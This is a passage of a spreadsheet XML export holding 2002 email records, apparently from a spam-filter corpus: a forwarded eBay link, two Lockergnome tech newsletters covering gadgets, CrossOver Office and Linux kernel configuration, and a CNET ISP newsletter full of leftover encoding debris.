    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 12 Sep 2002 01:43:58 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 12 Sep 2002 01:43:58 -0400 (EDT)</t>
  </si>
  <si>
    <t>Something for the person who has everything</t>
  </si>
  <si>
    <t>Interesting ebay item......(and no it wasnt me even though the spellingis\noddly familar)\n\n[URL]http://cgi.ebay.com[/URL]</t>
  </si>
  <si>
    <t>http://cgi.ebay.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Digital Media &lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 11 Jul 2002 19:51:07 -0500</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 19:51:07 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Digital Media]  Alphabet Speakerphone</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![See You\nat Gnomedex\n2002!]([URL]http://www.lockergnome.com[/URL]  \n  \n---  \n|\n\n 07.10.2002 MediaREPORT  \n  \n---  \n  \n**A BOOK FOR EVERY GEEK:** Want to know more about networking? Have you ever\nwanted to write an e-book? Maybe you need to polish your Web design skills?\nGet full-length books from the Poor Richard's series, including **Poor\nRichard's E-mail Publishing** , by Chris Pirillo, at GnomeTomes.com, for 50%\noff the suggested retail price of the print versions. Click here to learn\nmore.  \n---  \n  \nI'm now twice a published author. Earlier in the week, I released my top 50\nMac OS X tips, which marks the only thing I've ever written that I expect\nanyone to pay for. If you happen to use OS X, go check them out. My second\npublication is a PDF only explanation of the process for converting Vinyl LPs\nto CD, by way of your PC (how's that for alphabet soup). For the time being,\nyou can get it absolutely free, with the caveat that I'd appreciate some feed\nback on what could be added to make it more useful (I'm considering some\nscreen shots for it if I get some time). What are you waiting for -- get\nsomething free already.\n\nWith the expiration of Lockergnome's old cell phone plan, Lori and I opted to\nmake a switch to Verizon, at the recommendation of Brian Stevens. I'm already\nhappy with the suggestion, as our previous provider had horrid customer\nservice, not to mention I now have a much geekier phone in the form of the\nKyocera QCP 6035 Palm powered unit. It's just larger than most Palm devices on\nthe market, but having the device integration is nice. It has all the\nfunctionality of a Palm, with some Internet browsing capabilities and of\ncourse, phone access. A built in speakerphone actually works better than I\nexpected, Now all I need to do is get more applications installed.\n\nOf interest to anyone who signed up for emusic after Chris and I talked the\nservice up and down last week: It seems they've added in the ballpark of 1,000\nUniversal titles to their roster of offerings. Not surprising considering\nthey're part of the same conglomerate, but still good news in terms of feature\nexpansion.\n\nJake Ludington  \n\n  \n\n GnomePRODUCER  \n  \n---  \n  \n**GIF Movie Gear v3.02 [1129k] W9X/NT/W2K/XP $40**\n\n[URL]http://www.moviegear.com[/URL]\n\nThe majority of GIF animation on the Web does absolutely nothing for me. I'm\nof the mindset that animation is meant to either tell a story or illustrate a\nconcept -- not put something in motion just because you can. That said, for\nanyone wanting to create animations, this tool makes it nice and easy. A\nstoryboard interface keeps you thinking like a movie maker as you build your\nanimated creations, which lends itself to helping anyone who'd like to get\nfrom point A to point B in an orderly fashion. The software supports PSD, JPG,\nAVI, BMP, and GIF formats, leaving your options open for creating animated\nsegments.\n\n  \n\n GnomeFEATURE  \n  \n---  \n  \n**Madshrimps Extreme CDROM Testing**\n\n[URL]http://www.madshrimps.com[/URL];=0&amp;l2;=30\n\nA little on the childish side, but this CD-Rom drive test is still very funny.\nWatch as this group rewrites the rules on drive benchmarking. If geek TV were\nmore like this, even non-geeks would tune in to watch (which probably says\nmore than it should about the lowest common denominator). A WMV capable player\nis required,.\n\n  \n\n GnomeSKIN  \n  \n---  \n  \n**Modular Orbb XP forS2 Remotes** by Travelian  \n![](images/blank.gif) Posted on 7/11/02 2:17PM --  \n\n![S2 Remotes by\nTravelian]([URL]http://www.deskmod.com[/URL]\n\n[Download]  \-- [Zoom]  \-- [Visit DeskMod]\n\n  \n\n  \n\n GnomeAUDIO  \n  \n---  \n  \n**Liquid Tension Experiment**  \nUnearthed by Jeff Orr\n\n[URL]http://www.yesiknow.com[/URL]\n\nFans of fusion guitar heroes, like Joe Satriani and Steve Vai, are going to\ndig this collection of talented players. Formed from the ashes of now defunct\nDream Theater, the current line up is inhabited by some of the most talented\n"school of music" players currently laboring in the rock genre, this is as\nhighbrow as rock gets. Challenging song structures and interesting time\nchanges will keep your mind stimulated while your ears are tuning in."\n\n**Now You Can Get Chris Pirillo In Your Mailbox, Too!** Computer Power User\nmagazine is for people who know that technology rocks. Its for people who\nenjoy wireless gadgets and fast Internet connections. For people who like\nrefreshing commentary from world class computing experts and honest reviews.\nDoes that sound like you? Get your 2 FREE TRIAL issues now!  \n---  \n  \n  \n\n GnomePLUGIN  \n  \n---  \n  \n**Wallpampered v2.0 [28k] W9X/NT/W2K/XP $5**  \nFor Photoshop\n\n[URL]http://photoshopplugins.tripod.com[/URL]\n\nSet your wallpaper directly from Photoshop. No need to save your work, no need\nto leave your work area. If you've just edited the picture you dreamed of\nusing as your next wallpaper, this plug-in makes it a snap to get that desktop\nre-imaged in a matter of clicks. Choose between tiling, centering, or\nstretching the image to fit the space, with an option for modifying the\nbackground color as well. The product is shareware, but you are on your honor\nto register, as there is no expiration or nagging from the software.\n\n  \n\n GnomeDVD  \n  \n---  \n  \n![DVD]([URL]http://images.lockergnome.com[/URL]  \nClick for Details  \n---  \n**Tapeheads** (R) 1988  \nComedy - 93min  \nReviewer's Tilt (2)\n\n![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]\n\nTwo out of work rent-a-cops make an attempt to break into the music video\nindustry in this quirky comedy. John Cusack and Tim Robbins make this comedy\nwork, starring as the two security guards as they send up all sorts of\nHollywood stereotypes. You can't help but laugh at the ridiculous predicaments\nthese two survive, as they are greeted with cameos by a who's who of music and\nmovie industry names. I'm sure neither Robbins nor Cusack would openly list\nthis movie on a resume, but it is indeed a brilliant performance by both of\nthem, especially as a demonstration of their ability to play off of each\nother. Although this is a late 80's release (one of the few 80's underground\nclassics I hadn't previously seen), it remains relevant to those out there who\nare looking to put it to the man. If you've ever hated the recording industry\nand its in-crowd attitude, you'll love this film. A closing reference to\nRene's Courtyard Cafe in Santa Monica, which is a regular stop for me every\ntime I'm in the LA area, prompted me to want to watch the film for a second\nviewing. The movie is humorous enough for several viewings. Nothing really\ngrabs attention on the DVD, but then again, the studio probably expects no one\nwill buy it anyway.\n\n  * Region 1 Encoding (US and Canada only) \n  * Color, Closed Captioned, Widescreen \n  * Sound: Dolby Digital 5.1 (English) \n  * Audio Commentary - Bill Fishman - Director, Michael Nesmith - Executive Producer, Catherine Hardwicke - Production Designer \n\n  \n\n GnomeWALLPAPER  \n  \n---  \n  \n**A N N I H I L A T I O N forAbstract** by prelude  \n![](images/blank.gif) Posted on 7/11/02 2:15PM --  \n\n![Abstract by\nprelude]([URL]http://www.deskmod.com[/URL]\n\n[Download]  \-- [Zoom]  \-- [Visit DeskMod]\n\n  \n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]  \n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. For further information, please refer to the GnomeCREDITS in\nthe sidebar.  \n---  \n  \n|\n\nLOCKERGNOME  \n  \n---  \n  \n Geekathon 2002\n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n Latest Audio Show  \n\n The GnomeSHOPPER\n\n Microsoft Office Tips  \n PC Productivity Tips  \n Cool Internet Tips  \n Windows 2000 Tips  \n Windows XP Tips  \n Top 50 Fun Sites  \n Must-Know Tech Terms  \n Top 50 Useful Sites  \n Top 75 Tech Sites  \n Top 50 PenguinCORE  \n Top 50 PenguinTWEAKS  \n\n Recommend Us!  \n Advertise With Us  \n High-Tech Job Search  \n Chat With Gnomies  \n Watch The Webcams  \n Computer Power User  \n\n Submit Your Opinion  \n Read Past Issues  \n Download X-Setup  \n About Lockergnome  \n Our Privacy Policy  \n View More Options  \n Get Chris's Book  \n\n General Feedback  \n E-mail the Editor  \n Jake's Blog  \n\n Our XML / RSS Feed  \n Syndicate Our Tips  \n Link To Lockergnome  \n\n![Syndicate Today's Content]([URL]http://www.lockergnome.com[/URL]\n\n  \n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \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GNOMEMUSIC  \n  \n---  \n  \n![Net Music Countdown]([URL]http://images.lockergnome.com[/URL]  \n---  \n  \n  \n**Nickelback's Too Hot For Canada**  \nNickelback fans and Camrose Canada may be seeing a special low tech version of\nthe NMC eCharters' Kiss-style stage...  \n  \n**Madonna Plays Bond's Foil**  \nYes, music fans, it has been confirmed. Madonna will show up in the next Bond\nmovie, Die Another Day. Reports say...  \n  \n**Dixie Chicks- DMB CMT Show Cancelled**  \nThe much-ballyhooed paring of the Dixie Chicks and the Dave Matthews Band may\nnever see the light of day. Here's...  \n  \n**Weezer Singer Goes to Crazy Town**  \nWeezer Singer Goes to Crazy Town Weezer front man Rivers Cuomo has lent his\nfingers to a track off Crazy Town's...  \n  \n**The Boss Will Barnstorm**  \nBruce Springsteen and the E Street Band are hitting the road to support their\nnew album The Rising and it will be a...  \n  \n**Not Much Sympathy for Michael**  \nThe King of Pop's claim that Sony Music is racist and has treated him badly\nisn't getting him much support in the...\n\n\n\nGNOMECREDITS  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.\n\n\n\n Search Past Issues:  \n![]([URL]http://images.lockergnome.com[/URL]\n\n|  \n  \n---  \n  \n\n\n![]([URL]http://www.lockergnome.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.lockergnome.com http://www.moviegear.com http://www.madshrimps.com http://www.deskmod.com http://www.yesiknow.com http://photoshopplugins.tripod.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://www.deskmod.com http://www.lockergnome.com http://www.lockergnome.com http://www.lockergnome.com http://images.lockergnome.com http://images.lockergnome.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Penguin Shell&lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 11 Jul 2002 17:39:04 -0500</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 17:39:04 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Penguin Shell]  Karaoke Kernel</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Linux\nCentral]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.10.2002 PenguinREPORT  \n  \n---  \n  \n**CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:** We've teamed up with\nDice.com to bring you a full service I.T. career enhancement solution. Whether\nyou are looking for your dream job or trying to hire talented people, the\nfull-featured career resource center is the place to start. Find your IT\ntalent solution today!  \n---  \n  \nI've just got a few quick thoughts today.\n\nFirst, the search is underway for the hosting solution mentioned in Monday's\nPenguin Shell. The response has been great, with more than two dozen offers of\nweb space for the Foundation for Children and Youth With Diabetes. It\ngratifying to see our community rally around a great cause. Know that whether\nyou answered the call or not, you're in the electronic company of some caring\nand compassionate folks. I've not yet heard whether a solution has been found\nfrom among the many offered, but I'll certainly keep you posted on the\noutcome.\n\nSecond, a few final clarifications on the 4th of July bruhaha. A reader\nbrought to my attention that, though he didn't believe it to be the case,\noffering my opinion on the state of America could be seen as trolling. That\ncertainly wasn't intended. Also, I've seen much email over the past week that\nstarted with, "Since you published the opinion of someone outside the US, I'd\nexpect that you'll publish an opinion in disagreement." Well, I did that\nalready - it was my own opinion that started the discussion. I can clearly see\nthe potential for this to get out of hand. So, this will be the last word on\nthe subject. Thanks for your opinions and your discussion, the vast majority\nof which was well-thought and reasonable. Both sides were presented and we're\nmoving on.\n\nOn to some Lockergnome news. If you haven't already heard, CleverMedia is\nsponsoring karaoke night at Gnomedex. According to the woman with her finger\non the pulse of Gnomedex, Lori Lockwood, "There is definitely a 'surprise' in\nthe works for the attendees ... " Hmmm. Could it even compare to last year's\nMiss Gnomedex contest? I think it unlikely. In any regard, the folks at\nCleverMedia are certainly more than capable of coming up with loads of fun --\nit's what they do for a living! Between Leo Laporte, Doc Searls, Steve Gibson,\nMark Thompson, Evan Williams, and too many others to mention, you'd be silly\nto miss out.\n\nOnward. Have a great day.\n\nTony Steidler-Dennison  \n\n  \n\n GnomeTWEAK  \n  \n---  \n  \n**Lockergnome readers, SAVE 50% on the Computing Encyclopedia!** Are you\nlooking for the ultimate computing resource? Discover the _Computing\nEncyclopedia_ from Smart Computing. Regular price $59, SPECIAL OFFER for\nLockergnome readers, get your set TODAY, ONLY $29.95!  \n---  \n  \n**Windows Apps in Linux? - Part II**\n\nI don't want to mince any words, here. CodeWeavers has really hit a sweet spot\nwith their recently-released CrossOver Office product. This is, quite simply,\nthe fulfillment of the promise of the Wine Project. Using this slick little\napp, virtually all the applications in the Microsoft Office suite are fully\nfunctional in Linux. Frankly, I never thought I'd see the day when running\nWindows apps in Linux was exciting. Maybe it's time to take up shucking ice\ncubes in the blasted lands.\n\nLet's break this product up a bit. If purchased as a bundle, both CrossOver\nOffice and CrossOver Plugin (as we discussed yesterday) share an install\nscript. They do, however, require separate install processes, so they need to\nbe launched individually from a shared window.\n\nI started the CrossOver Office install, dropped my Office 2000 disc in the CD\ndrive, and fired up the install. It looked and performed exactly as you'd\nexpect to see it in Windows. I was able to customize the install, as I always\nhave, then let it run. At the end of the process, CrossOver Office "fakes" a\nWindows reboot and the Office suite installation is complete.\n\nEven Internet Explorer 5.0 is installed. There's an option in the CrossOver\nOffice package to install IE 5.5 but, to my chagrin, this was the one area of\nthe install that failed. Actually, the install itself may have succeeded - I\nwas just left without an IE browser following the upgrade. It's hard to tell\nwhether that was a fault in CrossOver Office, or in the IE program itself.\n\nFor the most part, these apps perform in Linux as they do in Windows. The IE\ninstall was a bit kludgy, with some font problems and an inability to\ncustomize the toolbar. Word worked perfectly, allowing me even to pull\ntogether legal documents for a friend's business without so much as a hiccup.\nEven printing works well with the installation of a "Wine Postscript Printer"\ndriver.\n\nLet me reiterate something I said yesterday. I've watched the Wine Project\nwalk, then crawl, then walk again over the past few years. I've always\nsuspected that the fits and starts were not for lack of talent. With the\nfinancial backing of CodeWeavers, it appears that my suspicions were well\nfounded. Wine has, through CrossOver Office and CrossOver Plugin, matured to a\nlevel of useability that should easily attract Linux users throughout the\nspectrum of experience. In the big picture, widespread acceptance of these\nproducts could remove the last remaining roadblock for many current Windows\nusers to make the leap to Linux: the loss of Word and Excel. They simply don't\nneed to fear those losses any more.\n\nA note on the "for pay" structure of these products seems in order. As you\nwell know, I'm an open source guy through and through. But, this is clearly a\ncase in which the "free" efforts of talented and dedicated developers simply\nwasn't enough to close the gap. The value of these products easily outweighs\ntheir minimal cost. And, if it keeps these developers moving forward, it seems\nto be the perfect pay model for Linux.\n\nRecommend It!  \nSend us a GnomeTWEAK\n\n  \n\n GnomeCORE  \n  \n---  \n  \n**Kernel Configuration - Part X**\n\nToday we're looking into the mysteries of Plug and Play support in your Linux\nkernel configuration.\n\nThere's really not much mystery to it. This section simply asks the question,\n"Do you want plug and play support in the kernel?" In other words, do you have\nall the PCI and ISA devices in your system that you'll ever need to have? If\nyou're set solid with your current machine, there's no use to add the overhead\nof PnP to your system's kernel code, or as a loadable module. If, on the other\nhand, you've got PCI or (on an older system) ISA slots just begging to be\nfilled, build this support into the kernel or select it as modules.\n\nSee, this kernel gig isn't really so tough. In fairness, we're hitting the\nhigh points without a heady discussion of the hidden workings. The discussion\nof PnP alone could comprise a full series in Penguin Shell. But, so far, the\nconfiguration has been pretty straightforward.\n\nTomorrow, we _will_ dive a bit deeper, with a discussion of block device\nkernel configuration.\n\nRecommend It!  \nSend us a GnomeCORE tip\n\n  \n\n GnomeFILE  \n  \n---  \n  \n**LiquidWar**\n\n  \n[URL]http://www.ufoot.org[/URL]\n\n"Liquid War is a truly original multiplayer wargame. You control an army\nformed with thousands of pixels (fighters) which look like liquid and try to\neat your opponent. You can play against a primitive NPC/AI or up to 5 other\nhuman players. Network play is available."\n\nRecommend It!  \nSend us a GnomeFILE suggestion\n\n  \n\n GnomeVOICE  \n  \n---  \n  \n**Gnome 2 Installation Notes**  \nScribbled by Dale Hirt\n\n"As always, am loving the newsletter. I've been getting it since day one, and\nI love all the stuff that you have put in it.\n\n"Just a quick word about the Gnome2 installation. At least so far in my\ninstallation wonders, I have noticed that you need to install intltool (#15)\nbefore scrollkeeper (#3), as it is required in order to build.\n\nThanks again for a great newsletter."\n\nRecommend It!  \nSpeak your GnomeVOICE\n\n  \n\n GnomeCLICK  \n  \n---  \n  \n**Linmodems.org**\n\n[URL]http://www.linmodems.org[/URL]\n\nLinmodems.org is a full-featured site on modem hardware and setup in Linux.\nThis has always been a point of friction with Linux users - finding that the\nmachine you've just coverted doesn't have a Linux-compatible modem, or finding\nmodem configuration to be too difficult. Linmodems.org takes on both these\nissues with skill and ease. The site includes discussion on hardware, software\nand chipsets. It also links to sites to walk you through the process of\nsetting up a winmodem in Linux. This is a great resource of your main\nconnection to the e-universe is via a dialup connection.\n\nRecommend It!  \nSuggest a GnomeCLICK\n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]\n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. Use of the Gnome moniker by Penguin Shell does not imply\nendorsement of the Gnome Desktop Environment. Penguin Shell is an equal-\nopportunity desktop employer. For further information, please refer to the\nGnomeCREDITS in the sidebar.  \n---  \n  \n|\n\nLOOK OVER HERE  \n  \n---  \n  \n Download Tip eBooks  \n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n Latest Audio Show  \n\n Low Price Search  \n Our Tech Conference  \n\n Microsoft Office Tips  \n PC Productivity Tips  \n Cool Internet Tips  \n Windows 2000 Tips  \n Windows XP Tips  \n\n![See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!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 Win a Digital Camera  \n\n General Feedback  \n Chris's Blog  \n E-mail the Editor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Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \n\n\nLOOK IT UP  \n  \n---  \n  \n\n\n\nBYTE ME NOW  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.qksrv.net http://www.ufoot.org http://www.linmodems.org http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Internet Services &lt;Online#3.19860.f9-f6ASlANZLfc4x9RR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 17:37:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 17:37:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Internet Services &lt;Online#3.19860.f9-f6ASlANZLfc4x9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Broadband ISPs wise up to wireless, defend (or don't) against hackers (CNET INTERNET SERVICES)</t>
  </si>
  <si>
    <t>![3D"Internet](3D"[URL]http://www.cnet.co[/URL]   =09=09=09 =09=09=09=09| ![](3D"http://home=)      ---   =09=09=09=09 =09=09=09=09=09![](3D"ht=)   =09=09=09=09=09| ![](3D"[URL]http://home.cnet.com[/URL]   =09=09=09=09=09| ![](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09=09   =09=09=09=09![](3D"[URL]http://home.cnet.com[/URL]      =09=09=09 =09 =09 =09=09![](3D"[URL]http://home.cnet.com[/URL]")   =09=09 =09=09|      ---   =09=09 ![](3D"[URL]http://i.i.com.com[/URL] =20 ![](3D"[URL]http://www.techrepublic.com[/URL]    ![3D"Most](3D"[URL]http://www.cnet.com[/URL]")   **Reseller Accounts**    **1.**  Infinology Corp., $59   = **2.**  ReadyHosting.com, $4.12    **3.** =  Aplus.Net, $79.95    **4.**  One World Hosting, $10    **5.**  Superb Internet, $5       **More providers**   &lt;= /tr&gt;   ![3D"Also](3D"[URL]http://home.cnet.com[/URL]   | **Live tech help now =20 May's Editors' Choice =20 1 million open jobs =20 News.com: Top CIOs =20 ZDNet: PeopleSoft =20 **   ---      ![](3D"[URL]http://www.cnet.com[/URL]   =09| ![](3D"[URL]http://www.cnet.com[/URL]")   ---   =09![](3D"[URL]http://www.cnet.com[/URL]")   =09![](3D"[URL]http://www.cnet.com[/URL]")   =09 =09| ![](3D"[URL]http://www.cnet.com[/URL]")   ---   =09![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL]   =09| ![](3D"[URL]http://home.cnet.com[/URL] =09|  =09=09 =09=09=09 =09=09=09| ![3D""](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09|  =09=09 =09=09=09![](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09![](3D"[URL]http://home.cnet.com[/URL]")July 11, 2002   =09=09=09![](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09=09 =09=09=09=09 =09=09=09=09=09| =09=09=09=09=09=09![](3D"[URL]http://a.r.tv.com[/URL]   =09=09=09=09=09=09 \--Lindsey Turrentine   Senior editor   CNET Software and Internet   =09=09=09|  =09=09=09|  =09=09=09 **Dear Readers,**   =09=09=09 Your ISP, if it's anything like mine, works like a very large boat: It moves slowly, it turns slowly, and sometimes it leaks. Take rogue wireless networks, for example. For many months now, some mischievous entrepreneurs have been hacking into major ISP networks and siphoning off bandwidth for neighborhood wireless networks. Only now, months later, are broadband bigwigs **doing something about it**. And what about ISP hackers? Could they break into your service provider? Probably. Thankfully, you can protect yourself against most of these leaks. Let Dan Tynan, our ISP guru, **show you how**. =09=09 =09=09=09   ---|---|---   =09=09=09=09 =09=09=09=09 =09=09=09=09![3D""](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09   =09=09 =09  =09=09 | ![3D"advertisem=](3D"[URL]http://www.cnet.com[/URL]   ---   &lt;= b class=3D"v1"&gt; **Quick links to Services &amp; Prices from these companies**      =09=09 =09=09  =09=09  =09=09 |  =09=09  =09=09 |  =09=09  =09=09 |  =09=09   =09  =20 =09   =09 =09 =09 =09=09![](3D"[URL]http://home.cnet.com[/URL]") =09   ---   =09 =09  ![3D"Crucial](3D"[URL]http://www.cnet.com[/URL]")   | ![](3D"[URL]http://home.cnet.com[/URL]   ---   ![](3D"[URL]http://home.cnet.com[/URL] | ![](3D"[URL]http://home.cnet.com[/URL]") | ![](3D"[URL]http://home.cnet.com[/URL]") | ![](3D"[URL]http://home.cnet.com[/URL]") | ![](3D"[URL]http://home.cnet.com[/URL]   =09 =09 =09| ![3D""](3D"[URL]http://a.r.tv.com[/URL]&lt;= /a&gt; =09| ![](3D"[URL]http://home.cnet.com[/URL]") =09|  **5-megapixel shoot-out**   Not all high-res cameras were create= d alike. We put four to the test to find out what sets each apart. =09   ---|---|---   =09![](3D"[URL]http://home.cnet.com[/URL]")   =09Â• Cameras coming soon   =09Â• Point-and-shoot picks   =09   =09 ![](3D"[URL]http://home.cnet.com[/URL]") |  =09 =09| ![3D""](3D"[URL]http://home.cnet.c[/URL]   ---   =09 =09![3D""](3D"[URL]http://home.cnet.com[/URL]") =09| ![](3D"[URL]http://home.cnet.com[/URL]") =09| ![3D""](3D"http://=)   =09 **Most po= pular**   ![3D""](3D"[URL]http://home.cnet.com[/URL]")   =09 **Desktops**   ![3D""](3D"[URL]http://home.cnet.com[/URL]")   =091. Dell Dimension 4400   ![3D""](3D"[URL]http://home.cnet.com[/URL]   =092. Sony VAIO PCV-RX650   ![3D""](3D"[URL]http://home.cnet.com[/URL]   =093. Dell Dimension 4400 for Home   ![3D""](3D"http://home=)   =094. Dell Dimension 8200   ![3D""](3D"[URL]http://home.cnet.com[/URL]   =095. Dell Optiplex GX240   ![3D""](3D"[URL]http://home.cnet.com[/URL]   =09![3D""](3D"[URL]http://a.r.tv.com[/URL]") **See all= most popular**   =09![3D=](3D"[URL]http://home.cnet.com[/URL]")   =09 =09| ![](3D"[URL]http://home.cnet.com[/URL]") =09| ![3D""](3D"[URL]http://home.cnet.com[/URL]") =09   =09![3D""](3D"[URL]http://home.cnet.c[/URL]   =09   ![](3D"[URL]http://home.cnet.com[/URL]   ![](3D"[URL]http://home.cnet.com[/URL]   =09=09=09 ![3D"Review"](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://home.cnet.com[/URL]")   **This week in Internet Services**   Big broadband providers are ticked off about Wi-Fi hot spots. In fact, both AT&amp;T Broadband and Time Warner Cable have begun campaigns to stop subscribers from sharing their accounts with others at no charge. Also this week: we review Yahoo"s new dial-up service. **Is your ISP safe from hackers?**   Surely, the folks who run your ISP have thought good and hard about security issues, but should you count on their skills to ward off intruders? Not wise, says our ISP expert. In this week"s column, Dan Tynan takes security matters into his own hands and shows you how to protect yourself. ![3D"The](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://www.cnet.com[/URL]")   **Domain names**   A domain name provides an online identity and contact point for your business, organization, or project. Almost every transaction on the Internet relies upon a domain name to conduct commerce, display Web pages, deliver e-mail, and more. Secure your own domain here.      ![3D"This](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://www.cnet.com[/URL]")   ****Comcast shareholders bless AT &amp;T deal****   Comcast shareholders on Wednesday approved the cable television company's $27 billion purchase of larger rival AT&amp;T Broadband, which will create the nation's largest cable TV operator with more than 22 million customers.   **U.S. Attorney investigates Qwest=20**   Qwest Communications International, the number-four U.S. local telephone carrier, said Wednesday that the U.S. Attorney's office in Denver has begun a criminal investigation of the company.   ![3D"Tip](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://www.cnet.com[/URL]")   **Antivirus guide 2002**   You want to protect your PC, of course. But how? We"ll walk you through some of your best antivirus options. Our reviewers looked at 10 top antivirus products and sorted out the features and levels of protection found in each.      ![3D"On](3D"[URL]http://home.cnet.com[/URL]")   ![](3D"[URL]http://home.cnet.com[/URL]")   | **   * Tech Trends   * Hardware   * Software   * Shopping   * Downloads  **| **   * News   * Investing   * Electronics   * Web Building   * Help &amp; How-Tos  **| **   * Internet   * Games   * Message Boards   * CNET Radio   * Music Center  **   ---|---|---   =09 =09 =09 =09|  =09|  **Search =09|  =09|  =09 Internet Services =09All CNET =09The Web=09 =09 =09|  = =20 =09 =09   ---|---|---|---|---   =09=20 =09   =20  ![](3D"[URL]http://home.cnet.com[/URL]")   =09=09 =09   =09![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL]   ---|---|---|---|---   =09![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL]   ---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]"=) | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL] | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL] | ![](3D"[URL]http://www.cnet.com[/URL]"=) | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]")   ![3D"Sign](3D"[URL]http://a.r.tv.com[/URL]")&lt;= br&gt;  The e-mail address for your subscription is qqqqqqqqqq-cnet-newsletter= s@example.com Unsubscribe |  Manage My Subscriptions  | FAQ |  Advertise   ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---|---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]"=) | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---   ![](3D"[URL]http://www.cnet.com[/URL] | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]") |  Price comparisons | Product reviews | Tech news | Downloads | All CNET services | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL]")   ---   |    **Copyright 2002 CNET Networks, Inc. All rig= hts reserved.** | ![](3D"[URL]http://gserv-cnet.zdnet.com[/URL] =      ![](3D"[URL]http://clickthru.online.com[/URL]</t>
  </si>
  <si>
